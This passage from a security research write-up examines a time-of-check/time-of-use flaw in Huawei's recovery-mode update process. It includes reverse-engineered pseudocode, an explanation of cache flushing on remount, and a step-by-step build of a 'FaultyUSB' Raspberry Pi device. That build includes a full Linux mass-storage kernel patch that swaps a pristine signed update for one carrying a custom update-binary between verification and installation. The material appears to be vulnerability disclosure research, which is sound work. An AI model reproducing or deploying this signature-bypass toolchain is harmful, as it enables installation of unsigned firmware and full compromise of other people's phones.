At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effects on exploitability. For readability reasons this challenge is outlined in the next section, so for now we continue with the assumption that we will be able to swap results between repeated read operations.

Sketching out the code flow of an update procedure helps understanding exactly where multiple reads can occur. Since our last exploit) of Huawei’s recovery mode some changes have occured (e.g. functions got renamed), so the update flow is detailed again here for clarity.

First of all, the “SD-update” method is handled by 

HuaweiUpdateNormal
, which essentially wraps the 
HuaweiUpdateBase
 function. Below is an excerpt of the function call tree of 
HuaweiUpdateBase
, mostly indicating the functions which interact with the update media or contain essential verification functions.

HuaweiUpdateBase
├── [> DoCheckUpdateVersion <]
│   ├── {> hw_ensure_path_mounted("/usb") <}
│   ├── CheckVersionInZipPkg
│   │   ├── mzFindZipEntry("SOFTWARE_VER_LIST.mbn")
│   │   ├── mzFindZipEntry("SD_update.tag")
│   │   ├── mzFindZipEntry("OTA_update.tag")
│   │   ├── DoCheckVersion
│   │   ├── mzFindZipEntry("BOARDID_LIST.mbn")
│   └── {> hw_ensure_path_unmounted("/usb") <}
└── HuaweiOtaUpdate
    └── DoOtaUpdate
        ├── MountSdCardWithRetry
        │   └── {> hw_ensure_path_mounted("/usb") <}
        ├── PkgTypeUptVerPreCheck
        │   └── HwUpdateTagPreCheck
        │       └── UpdateTagCheckInPkg
        │           ├── mzFindZipEntry("full_mainpkg.tag")
        │           └── GetInfoFromTag("UPT_VER.tag")
        ├── [> HuaweiUpdatePreCheck <]
        │   ├── HuaweiSignatureAndAuthVerify
        │   │   ├── HwMapAndVerifyPackage
        │   │   │   ├── do_map_package
        │   │   │   │   └── hw_ensure_path_mounted("/usb")
        │   │   │   ├── HwSignatureVerifyPackage
        │   │   │   │   ├── GetInfoFromTag("hotakey_sign_version.tag")
        │   │   │   │   └── verify_file_v1
        │   │   │   │       └── verifyInstance.Verify
        │   │   │   └── GetInfoFromTag("META-INF/CERT.RSA")
        │   │   ├── IsSdRootPackage
        │   │   │   └── get_zip_pkg_type
        │   │   │       ├── mzFindZipEntry("SD_update.tag")
        │   │   │       ├── mzFindZipEntry("OTA_update.tag")
        │   │   │       └── get_pkg_type_by_tag
        │   │   │           └── mzFindZipEntry("OTA/SD_update.tag")
        │   │   └── HwUpdateAuthVerify
        │   │       ├── IsNeedUpdateAuth
        │   │       ├── IsUnauthPkg
        │   │       │   ├── IsSDupdatePackageCompress
        │   │       │   │   └── mzFindZipEntry("SD_update.tag")
        │   │       │   └── mzFindZipEntry("skipauth_pkg.tag")
        │   │       └── get_update_auth_file_path
        │   │           └── mzFindZipEntry("VERSION.mbn")
        │   ├── DoSecVerifyFromZip
        │   │   └── HwSecVerifyFromZip
        │   │       └── mzFindZipEntry("sec_xloader_header")
        │   ├── IsAllowShipDeviceUpdate
        │   ├── MtkDevicePreUpdateCheck
        │   ├── CheckBoardIdInfo
        │   │   └── mzFindZipEntry("BOARDID_LIST.mbn")
        │   ├── UpdatePreCheck_wrapper
        │   │   └── UpdatePreCheck
        │   │       └── CheckPackageInfo
        │   │           ├── MapAndOpenZipPkg
        │   │           ├── InitPackageInfo
        │   │           │   └── mzFindZipEntry("packageinfo.mbn")
        │   │           └── CheckZipPkgInfo
        │   └── USBUpdateVersionCheck
        ├── HuaweiUpdatePreUpdate
        └── [> EreInstallPkg <]
            ├── hw_setup_install_mounts
            │   └── {> hw_ensure_path_unmounted("/usb") <}
            ├── do_map_package
            │   └── {> hw_ensure_path_mounted("/usb") <}
            ├── mzFindZipEntry("META-INF/com/google/android/update-binary")
            └── execv("/tmp/update_binary")

The functions in square brackets divide the update process into three phases:

  • Device firmware version compatibility checking
  • Android signature verification, update type and version checking
  • Update installation via the provided 
    update-binary
     file

In the first stage the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse engineered pseuodocode.)

bool DoCheckUpdateVersion(ulong argc, char **argv) {

  ... /* ensures the battery is charged enough, else exit */

  for (pkgIndex = 1; argc <= pkgIndex; pkgIndex++) {
    curr_arg = argv[pkgIndex];
    if (curr_arg || !strncmp(curr_arg,"--update_package=",0x11)) {
      log("%s:%s,line=%d:skip path:%s,pkgIndex:%d\n","Info","CheckAllPkgVersionAllow",0x1dd,curr_arg,pkgIndex & 0xffffffff);
      continue;
    }
    curr_arg = curr_arg + 0x11;
    log("%s:%s,line=%d:reallyPath:%s\n","Info","DoCheckUpdateVersion",0x1c0,curr_arg);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Here curr_arg points to the file path of the update archive *
     * The media which contains this file is getting mounted       *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    r = hw_ensure_path_mounted_wrapper(curr_arg,"DoCheckUpdateVersion");
    if (r < 0) {
      log("%s:%s,line=%d:mount %s fail\n","Err","DoCheckUpdateVersion",0x1c2,curr_arg);
      return false;
    }

    set_versioncheck_flag(0);
    SetPkgSignatureFlag(1);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Examine the 'SOFTWARE_VER_LIST.mbn' file for compatibility  *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    check_ret = CheckVersionInZipPkg(curr_arg);
    SetPkgSignatureFlag(0);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Explicitly unmount the media holding the update archive     *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    r = hw_ensure_path_unmounted_wrapper(curr_arg,"DoCheckUpdateVersion");
    if (r < 0) {
      log("%s:%s,line=%d:unmount %s fail\n","Warn","DoCheckUpdateVersion",0x1cb,curr_arg);
    }

    if ((check_ret & 1) == 0) {
      log("%s:%s,line=%d:%s,not allow in version control\n","Err","DoCheckUpdateVersion",0x1ce,curr_arg);
      log("%s:%s,line=%d:push UPDATE_VERSION_CHECK_FAIL_L1\n","Info","DoCheckUpdateVersion",0x1cf);
      push_command_stack(&command_stack,0x85);
      return false;
    }
    ret = true;
  }

  return ret;
}

The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection on the compatibility of the update and the device.

int HuaweiOtaUpdate(int argc, char **argv) {
  ...
  log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
  ...
  ret = DoOtaUpdate(argc, argv);
  ...
}

int DoOtaUpdate(int argc, char **argv) {
  ... /* tidy the update package paths */

  g_totalPkgSz = 0;
  for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * The media which contains the update package gets mounted here *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    MountSdCardWithRetry(path_list[pkgIndex],5);

    ... /* ensuring that the update package does exist */

    pkgIndex = pkgIndex + 1;
    g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
  } while (pkgIndex < count);
  log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);

  result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
    return 1;
  }
  result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
    return 1;
  }
  result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
    return 1;
  }

  ...

  for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
    log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
    push_command_stack(&command_stack,3);
    package_path = path_list[pkgIndex];
    ... /* ensure the package does exists */
    ... /* update the visual update progress bar */
    log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
    pop_command_stack(&command_stack);
    log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
    push_command_stack(&command_stack,4);
    log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
        package_path);

    /* 'IsPathNeedMount' returns true for the SD update package paths */
    needs_mount = IsPathNeedMount(package_path_string);
    ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);

    ... /* update the visual update progress bar */
  }
}

int MountSdCardWithRetry(char *path, uint retry_count) {
  ... /* sanity checks */
  if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * USB drives mounted under the '/usb' path, so this path is taken     *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    for (trial_count = 1; trial_count < retry_count; trial_count++) {
      if (hw_ensure_path_mounted(path))
        return 0;
      ... /* error handling */
      sleep(1);
    }
    log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
    return -1;
  }
  if (hw_ensure_path_mounted(path)) {
    ... /* error handling */
    return -1;
  }
  return 0;
}

Finally in the third stage the update installation begins by extracting the 

update-binary
 from the update archive and executing it. From this point forward, the bundled update binary handles the rest of update process, like extracting the 
UPDATE.APP
 file containing the actual data to be flashed.

uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
  ... /* create and write the 'path' value into the 'last_install' file */
  if (!path || g_otaUpdateMode != 1 ||  get_current_run_mode() != 2) {
    log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode  is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
    ret = hw_setup_install_mounts();
  } else {
    ... /* with SD update mode this path is not taken */
  }
  if (!ret) {
    log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
        "Err","install_package",0x5b8);
    return 1;
  }
  ... /* logging and visual progess related functions */
  ret = do_map_package(path, need_mount & 1, &package_map);
  if (!ret) {
    log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
    return 2;
  }

  zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
  ... /* error handling */
  updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
  log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
  push_command_stack(&command_stack,0xd);
  ... /* error handling */
  unlink("/tmp/update_binary");
  updatebinary_fd = creat("/tmp/update_binary",0x1ed);
  mzExtractZipEntryToFile(&archive,update-binary_entry,updatebinary_fd);
  EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
  ... /* FindUpdateBinaryFunc: check the kind of the update archive */
  mzCloseZipArchive(&archive);
  ...

  if (fork() == 0) {
    ...
    execv(updatebinary_path, updatebinary_argv);
    _exit(-1);
  }
  log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
  push_command_stack(&command_stack,0x16);

  ...
}

int hw_setup_install_mounts(void) {
  ...
  for (partition_entry : g_partition_table) {
    if (!strcmp(partition_entry, "/tmp")) {
      if (hw_ensure_path_mounted(partition_entry)) {
        log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
        return -1;
      }
    }
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Every entry in the partition table gets unmounted except /tmp *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    else if (hw_ensure_path_unmounted(partition_entry)) {
      log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
      if (!strcmp(partition_entry,"/data") && !try_umount_data())
        log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
    }
  }
  return 0;
}

int do_map_package(char *path, bool needs_mount, void *package_map) {
  ... /* sanity checks */
  if (needs_mount) {
    if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
      log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
      return 0;
    }
    for (trial_count = 0; trial_count < 10; trial_count++) {
      log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);

      /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * needs_mount = true, so the USB flash drive gets mounted here  *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
      if (hw_ensure_path_mounted(path)) {
        log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
        return 0;
      }
      ... /* error handling */
      sleep(1);
    }
    ... /* error handling */
  }
  if (sysMapFile(path,package_map) == 0) {
    log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
    return 1;
  }
  log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
  return 0;
}

Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards because the recovery process would try to extract and run the 

update-binary
 file of the update archive. Thanks to these multiple reads, the attacker could therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges:

  • Version checking stage: construct a valid 
    SOFTWARE_VER_LIST.mbn
     file
  • Signature verification: supply a pristine update archive
  • Installation: inject the custom 
    update-binary

Circumventing Linux Kernel Caching Of External Media

The previous section introduced our “straightforward” exploitation plan.

However, in practice, it does not suffice to just treat the file read syscalls of the update binary as if they could directly result in a unique read request to external media.

The relevant update files are actually 

mmap
-ed by the update binary, and the generated memory read accesses get handled first by the file system API, then by the block device layer of Linux kernel, and finally, after all those layers, they get forwarded to the external media. The file system API uses the actual file system implementation (e.g. exFAT) to turn the high level requests (e.g. “read the first 
0x400
 bytes from the file named 
/usb/update_sd_base.zip
”) into a lower level access of the underlying block device (e.g. “read 
0x200
 bytes from offset 
0x12340000
 and read 
0x200
 bytes from offset 
0x56780000
 on the media”). The block device layer generates the lowest level request, which can be interpreted directly by the storage media, e.g. SCSI commands in case of a USB flash drive.

In addition, the Linux kernel caches the read responses of both the file system API (page cache), and the block devices (block cache, part of the page cache). So at the second time the same read request arrives, the response may be served from cache instead of the storage media, but it depends on the amount of free memory.

Therefore, in the real world, frequent multiple reads of external media normally do not occur thanks to the caching of the operation system. In other words, it is up to the Linux kernel’s caching algorithm when a memory access issued by the recovery binary actually translates into a direct read request to the external media, besides depending heavily on the amount of free memory available. In practice, our analysis showed that the combination of the caching policy and the about 7 GB of free memory (on flagship phones) works surprisingly well, virtually zero reread should be occuring while handling update files, which are at most 5 GB in size, thus they fit into the memory as a whole. So, at first glance, you might think that the Linux kernel’s caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!

We can take a step back from caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we’ve previously defined! The file cache of Linux kernel is naturally bounded to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command would start with an empty cache state, so the update file must be read again directly from the external media. This certainly and deterministically enables an attacker to supply a different update archive or even a completely new file system at each mount command, thus eventually it can be used to bypass the cryptographic verification and supply arbitrary update archive as per above. Phew 🙂

Creating FaultyUSB

Based on the above, we have an exploit plan, but still what was left is actually implementing our previously discussed “FaultyUSB”: a USB flash drive (USB-OTG mass storage), which can detect the mount events and alter the response data based on a trigger condition. In the following we give a brief, practical guide on how we set up our test environment.

Raspberry Pi As A Development Platform

The Linux kernel has support for USB OTG mass storage device class in general, but we needed to find a computer which has the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for the ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) model was used, as it supports USB OTG mode on its USB-C connector.

Finally we can put the SD card back into the RPi and connect it to a router via the Ethernet interface. By default, Rasbian OS tries to negotiate an IP address via DHCP and broadcast the 

raspberry.local
 over mDNS protocol, so at first we simply connected to it over SSH via the previously configured username and password. But we didn’t find the DHCP reliable enough actually, so we decided to use static IP address instead:

sudo systemctl disable dhcpcd.service
sudo systemctl stop dhcpcd.service

echo 'auto eth0
allow-hotplug eth0
iface eth0 inet static
  address 10.1.0.1
  netmask 255.255.255.0' | sudo tee /etc/network/interfaces.d/eth0

“Raspberry Pi OS Lite (64bit) (2022.04.04.)” is used as a base image for the RPi, and written to an SD card. The size of the used SD card is indifferent as long the OS fits it, approx. minimum 2GB is recommended.

Writing the image to the SD card is straightforward:

xzcat 2022-04-04-raspios-bullseye-arm64-lite.img.xz | sudo dd of=/dev/mmcblk0 bs=4M iflag=fullblock oflag=direct

Then we mount the first partition and create a user account file and the configuration file and we also enable the SSH server. The 

userconf.txt
 file below defines the 
pi
 user with 
raspberry
 password. The config file disables the Wi-Fi and the Bluetooth to lower power usage, and also configures the USB controller in OTG mode. The command line defines the command to load the USB controller with the mass storage module.

mount /dev/mmcblk0p1 /mnt && cd /mnt

touch ssh

echo 'pi:$6$/4.VdYgDm7RJ0qM1$FwXCeQgDKkqrOU3RIRuDSKpauAbBvP11msq9X58c8Que2l1Dwq3vdJMgiZlQSbEXGaY5esVHGBNbCxKLVNqZW1' > userconf.txt

echo 'arm_64bit=1
dtoverlay=dwc2,dr_mode=peripheral
#arm_freq=600
arm_boost=0
disable_splash=1
dtoverlay=disable-bt
dtoverlay=disable-wifi
boot_delay=0' > config.txt

echo 'console=serial0,115200 console=tty1 root=PARTUUID=<UUID>-02 rootfstype=ext4 rootwait modules-load=dwc2,g_mass_storage' > cmdline.txt

cd && umount /dev/mmcblk0p1

Getting High On Our Own Power Supply

The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. In case of supplying power from the IO headers, the regulated 5 V voltage also appears on the VDD pins of the USB-C, and by connecting it to a Huawei phone it incorrectly detects the RPi being in USB host mode instead of the desired OTG mode. As it turned out the USB-C connector on the RPi is not in fact fully USB-C compatible…

Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot up and Huawei phones shut the power down while rebooting into recovery mode. Obviously, this means that the RPi shuts down for lack of power, and the target Huawei phone only enables the power over USB-C when it has been already booted into recovery mode. That’s why it is possible (and during our devlopment this occured several times) that the RPi misses the recovery’s timeout window of waiting for an USB drive, simply because it can’t boot up fast enough.

One way to solve this problem is to boot the phone into eRecovery mode, by holding the Power and Volume Up buttons, because that way the update doesn’t begin automatically, thus giving some time for the RPi to boot up. But we wanted to support a more comfortable way of updating, from the “Project Menu” application, “Software Upgrade / Memory card Updage” option, which results in automatic update of the archive without waiting for any user interaction.

Our solution was to power the RPi via a USB-C breakout board via a dedicated power supply adapter. Also the breakout board passes through the data lines to the target Huawei phone, but the VDD lines are disconnected (i.e. the PCB traces are cut) in the direction of the phone to prevent the RPi to be recognized as a host device. With this setup the RPi can be powered independently of the target device and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.

To further tweak the OS boot time and power consumption, we disable a few unnecessary services:

sudo systemctl disable rsyslog.service
sudo systemctl stop rsyslog.service
sudo systemctl disable avahi-daemon
sudo systemctl stop avahi-daemon
sudo systemctl disable avahi-daemon.socket
sudo systemctl stop avahi-daemon.socket
sudo systemctl disable triggerhappy.service
sudo systemctl stop triggerhappy.service
sudo systemctl disable wpa_supplicant.service
sudo systemctl stop wpa_supplicant.service
sudo systemctl disable systemd-timesyncd
sudo systemctl stop systemd-timesyncd

By further optimizing the power consumption, we disabled as much as we can from the currently unnecessary GPU subsystem. To avoid premature write-exhaustion of the SD card we disable persisting the log files, because we are about to generate quite a few megabytes of them.

echo 'blacklist bcm2835_codec
blacklist bcm2835_isp
blacklist bcm2835_v4l2
blacklist drm
blacklist rpivid_mem
blacklist vc_sm_cma' | sudo tee /etc/modprobe.d/blacklist-bcm2835.conf

echo '[Journal]
Storage=volatile
RuntimeMaxUse=64M' | sudo tee /etc/systemd/journald.conf

Finally we restart the RPi, verify that it is still accessible over SSH and shut it down in preparing of a kernel build.

Kernel Module Patching

The main requirement of the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different results based on current stage. The most obvious place to implement such feature is directly in the mass storage functionality implementation, which is located at 

drivers/usb/gadget/function/f_mass_storage.c
 in the Linux kernel.

The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process a very simple counting algorithm prooved to be sufficient. Specific parts of the file system seem to be only read during mount events, thus by counting mount-like patterns the update stage can be recovered.

While the trigger condition is active, the read responses are modified by masking by zeros. The read address and the masking area size should be configured to cover the smuggled ZIP at the end of the update archive.

Here is the 

mass_storage_patch.diff
 file, with huge amount of logging code:

diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
index 6ad669dde..653463213 100644
--- a/drivers/usb/gadget/function/f_mass_storage.c
+++ b/drivers/usb/gadget/function/f_mass_storage.c
@@ -596,6 +596,8 @@ static int do_read(struct fsg_common *common)
 	unsigned int		amount;
 	ssize_t			nread;
 
+	loff_t begin, end;
+
 	/*
 	 * Get the starting Logical Block Address and check that it's
 	 * not too big.
@@ -662,8 +664,35 @@ static int do_read(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nread = kernel_read(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "READ A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
 		      (unsigned long long)file_offset, (int)nread);
+
+		/* mask read on trigger (e.g. when trigger_counter == 1) */
+		if (
+			((file_offset + amount) > curlun->payload_offset) &&
+			(file_offset < (curlun->payload_offset + curlun->payload_size))
+		) {
+			LINFO(curlun, "READ ON PAYLOAD AREA (A=0x%llx S=0x%x)\n",
+			      file_offset, amount);
+			if (curlun->trigger_counter == 1) {
+				begin = max(file_offset, curlun->payload_offset) - file_offset;
+				end = min(file_offset + amount, curlun->payload_offset + curlun->payload_size) - file_offset;
+				LINFO(curlun, "READ ZERO-MASKED RANGE: [0x%llx;0x%llx)\n", begin, end);
+				memset(bh->buf + begin, 0, end-begin);
+			}
+		}
+
+		/* detect read on the trigger offset and decrement the trigger counter */
+		if (
+			(curlun->trigger_counter > 0) && 
+			(curlun->trigger_offset >= file_offset) &&
+			(curlun->trigger_offset < (file_offset+amount))
+		) {
+			LINFO(curlun, "READ ON TRIGGER OFFSET: T=%d\n", curlun->trigger_counter);
+			curlun->trigger_counter -= 1;
+		}
+
 		if (signal_pending(current))
 			return -EINTR;
 
@@ -858,6 +887,7 @@ static int do_write(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nwritten = kernel_write(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "WRITE A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file write %u @ %llu -> %d\n", amount,
 				(unsigned long long)file_offset, (int)nwritten);
 		if (signal_pending(current))
@@ -922,6 +952,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
 	unsigned long	rc;
 
 	rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+	LINFO(curlun, "invalidate_mapping_pages");
 	VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
 }
 
@@ -996,6 +1027,7 @@ static int do_verify(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nread = kernel_read(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "VERIFY A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
 				(unsigned long long) file_offset,
 				(int) nread);
@@ -2733,6 +2765,12 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
 	lun->initially_ro = lun->ro;
 	lun->removable = !!cfg->removable;
 
+	/* ToC-ToU patch */
+	lun->trigger_counter = cfg->trigger_counter;
+	lun->trigger_offset = cfg->trigger_offset;
+	lun->payload_offset = cfg->payload_offset;
+	lun->payload_size = cfg->payload_size;
+
 	if (!common->sysfs) {
 		/* we DON'T own the name!*/
 		lun->name = name;
@@ -2770,11 +2808,13 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
 				p = "(error)";
 		}
 	}
-	pr_info("LUN: %s%s%sfile: %s\n",
+	pr_info("LUN: %s%s%sfile: %s trigger:%d@0x%llx payload:[0x%llx;0x%llx)\n",
 	      lun->removable ? "removable " : "",
 	      lun->ro ? "read only " : "",
 	      lun->cdrom ? "CD-ROM " : "",
-	      p);
+	      p,
+	      lun->trigger_counter, lun->trigger_offset,
+	      lun->payload_offset, lun->payload_offset+lun->payload_size);
 	kfree(pathbuf);
 
 	return 0;
@@ -3333,6 +3373,9 @@ static struct usb_function_instance *fsg_alloc_inst(void)
 		goto release_common;
 
 	pr_info(FSG_DRIVER_DESC ", version: " FSG_DRIVER_VERSION "\n");
+	pr_info("***********************************\n");
+	pr_info("* Patched for ToC-ToU exploration *\n");
+	pr_info("***********************************\n");
 
 	memset(&config, 0, sizeof(config));
 	config.removable = true;
@@ -3428,6 +3471,12 @@ void fsg_config_from_params(struct fsg_config *cfg,
 			params->file_count > i && params->file[i][0]
 			? params->file[i]
 			: NULL;
+		
+		/* ToC-ToU patch */
+		lun->trigger_counter = params->trigger_counter[i];
+		lun->trigger_offset = params->trigger_offset[i];
+		lun->payload_offset = params->payload_offset[i];
+		lun->payload_size = params->payload_size[i];
 	}
 
 	/* Let MSF use defaults */
diff --git a/drivers/usb/gadget/function/f_mass_storage.h b/drivers/usb/gadget/function/f_mass_storage.h
index 3b8c4ce2a..1e13a2177 100644
--- a/drivers/usb/gadget/function/f_mass_storage.h
+++ b/drivers/usb/gadget/function/f_mass_storage.h
@@ -16,6 +16,15 @@ struct fsg_module_parameters {
 	unsigned int	nofua_count;
 	unsigned int	luns;	/* nluns */
 	bool		stall;	/* can_stall */
+
+	/* ToC-ToU patch */
+	int		trigger_counter[FSG_MAX_LUNS];
+	loff_t		trigger_offset[FSG_MAX_LUNS];
+	loff_t		payload_offset[FSG_MAX_LUNS];
+	loff_t		payload_size[FSG_MAX_LUNS];
+	unsigned int	trigger_counter_count, trigger_offset_count;
+	unsigned int	payload_offset_count, payload_size_count;
+
 };
 
 #define _FSG_MODULE_PARAM_ARRAY(prefix, params, name, type, desc)	\
@@ -40,6 +49,14 @@ struct fsg_module_parameters {
 				"true to simulate CD-ROM instead of disk"); \
 	_FSG_MODULE_PARAM_ARRAY(prefix, params, nofua, bool,		\
 				"true to ignore SCSI WRITE(10,12) FUA bit"); \
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_counter, int,	\
+				"The number of masking the payload area with zeros"); \
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_offset, ullong,	\
+				"Byte offset of the trigger area"); 	\
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, payload_offset, ullong,	\
+				"Byte offset of the payload area"); 	\
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, payload_size, ullong,	\
+			"Byte size of the payload area"); 		\
 	_FSG_MODULE_PARAM(prefix, params, luns, uint,			\
 			  "number of LUNs");				\
 	_FSG_MODULE_PARAM(prefix, params, stall, bool,			\
@@ -91,6 +108,12 @@ struct fsg_lun_config {
 	char cdrom;
 	char nofua;
 	char inquiry_string[INQUIRY_STRING_LEN];
+
+	/* ToC-ToU patch */
+	int trigger_counter;
+	loff_t trigger_offset;
+	loff_t payload_offset;
+	loff_t payload_size;
 };
 
 struct fsg_config {
diff --git a/drivers/usb/gadget/function/storage_common.h b/drivers/usb/gadget/function/storage_common.h
index bdeb1e233..84576bfcb 100644
--- a/drivers/usb/gadget/function/storage_common.h
+++ b/drivers/usb/gadget/function/storage_common.h
@@ -120,6 +120,12 @@ struct fsg_lun {
 	const char	*name;		/* "lun.name" */
 	const char	**name_pfx;	/* "function.name" */
 	char		inquiry_string[INQUIRY_STRING_LEN];
+
+	/* ToC-ToU patch */
+	int		trigger_counter;
+	loff_t		trigger_offset;
+	loff_t		payload_offset;
+	loff_t		payload_size;
 };
 
 static inline bool fsg_lun_is_open(struct fsg_lun *curlun)

We’ve done the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross compilation environment was needed. Acquiring the kernel sources (we used the 

a90c1b9c
) and applying the mass storage patch:

sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff

For kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules, they could have been trimmed down quite a bit.

KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs

After building the kernel, we copy the products to the SD card:

mount /dev/mmcblk0p1 /mnt/boot
mount /dev/mmcblk0p2 /mnt/root

mv /mnt/boot/kernel8.img /mnt/boot/kernel8-backup.img
mv /mnt/boot/overlays/ /mnt/boot/overlays_backup

mkdir /mnt/boot/overlays/
cp arch/arm64/boot/Image /mnt/boot/kernel8.img
cp arch/arm64/boot/dts/broadcom/*.dtb /mnt/boot/
